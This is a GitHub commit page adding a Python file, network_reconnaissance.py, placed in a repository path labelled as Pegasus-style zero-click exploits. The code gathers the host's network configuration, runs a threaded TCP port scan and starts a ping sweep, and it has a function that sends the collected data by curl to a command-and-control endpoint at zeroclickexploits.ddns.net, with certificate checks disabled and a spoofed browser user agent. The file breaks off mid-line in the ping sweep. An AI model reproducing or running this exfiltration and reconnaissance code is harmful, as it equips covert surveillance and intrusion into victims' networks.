Skip to content

Commit fb0a660

Browse files
Create network_reconnaissance.py
1 parent b7cf5b4 commit fb0a660

File tree

1 file changed

+99
-0
lines changed

1 file changed

+99
-0
lines changed
Lines changed: 99 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,99 @@
1+
# /src/exploits/zero-click_exploits/pegasus/network_reconnaissance/network_reconnaissance.py
2+
3+
import os
4+
import sys
5+
import subprocess
6+
import json
7+
import time
8+
import socket
9+
import threading
10+
from datetime import datetime
11+
12+
# --- Configuration ---
13+
# C2 Configuration to exfiltrate recon data
14+
C2_DOMAIN = "zeroclickexploits.ddns.net"
15+
C2_PORT = 443
16+
C2_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/exfil"
17+
TARGET_ID = os.environ.get("TARGET_ID", "unknown")
18+
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
19+
20+
# --- Logging ---
21+
def _log_event(message, level='info'):
22+
timestamp = datetime.now().isoformat()
23+
print(f"[{timestamp}] [{level.upper()}] {message}")
24+
25+
# --- C2 Communication ---
26+
def exfiltrate_data(data):
27+
"""Exfiltrates collected data to the C2 server."""
28+
try:
29+
payload = {
30+
"type": "network_recon",
31+
"timestamp": datetime.utcnow().isoformat() + "Z",
32+
"target_id": TARGET_ID,
33+
"data": json.dumps(data)
34+
}
35+
json_payload = json.dumps(payload)
36+
cmd = [
37+
"curl", "-k", "-s", "-X", "POST",
38+
"-H", "Content-Type: application/json",
39+
"-H", f"User-Agent: {USER_AGENT}",
40+
"-d", json_payload,
41+
"--connect-timeout", "10",
42+
"--max-time", "60",
43+
C2_ENDPOINT
44+
]
45+
subprocess.run(cmd, capture_output=True, text=True, timeout=70)
46+
_log_event("Reconnaissance data exfiltrated.")
47+
except Exception as e:
48+
_log_event(f"Failed to exfiltrate data: {e}", 'error')
49+
50+
# --- Core Recon Logic ---
51+
def get_local_network_info():
52+
"""Gathers basic local network information."""
53+
try:
54+
if sys.platform == 'win32':
55+
# Use ipconfig on Windows
56+
result = subprocess.run("ipconfig", capture_output=True, text=True, check=True)
57+
else:
58+
# Use ifconfig on Linux/macOS
59+
result = subprocess.run("ifconfig", capture_output=True, text=True, check=True)
60+
return {"local_network_config": result.stdout}
61+
except Exception as e:
62+
_log_event(f"Failed to get local network info: {e}", 'error')
63+
return {"error": str(e)}
64+
65+
def scan_host(host, ports, open_ports):
66+
"""Scans a single host for open ports."""
67+
for port in ports:
68+
try:
69+
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
70+
s.settimeout(1)
71+
result = s.connect_ex((host, port))
72+
if result == 0:
73+
open_ports.append(port)
74+
except Exception:
75+
continue
76+
77+
def port_scan(target, ports_to_scan, thread_count=50):
78+
"""Performs a multi-threaded TCP port scan on a target."""
79+
_log_event(f"Starting port scan on {target} for ports {ports_to_scan}")
80+
open_ports = []
81+
threads = []
82+
for port in ports_to_scan:
83+
thread = threading.Thread(target=scan_host, args=(target, [port], open_ports))
84+
threads.append(thread)
85+
thread.start()
86+
# Limit the number of concurrent threads
87+
if len(threads) >= thread_count:
88+
for t in threads:
89+
t.join()
90+
threads = []
91+
for t in threads:
92+
t.join()
93+
_log_event(f"Port scan on {target} finished. Open ports: {open_ports}")
94+
return open_ports
95+
96+
def ping_sweep(network_range):
97+
"""Performs a simple ping sweep to identify live hosts."""
98+
_log_event(f"Starting ping sweep on {network_range}")
99+
live_hosts =

0 commit comments

Comments
 (0)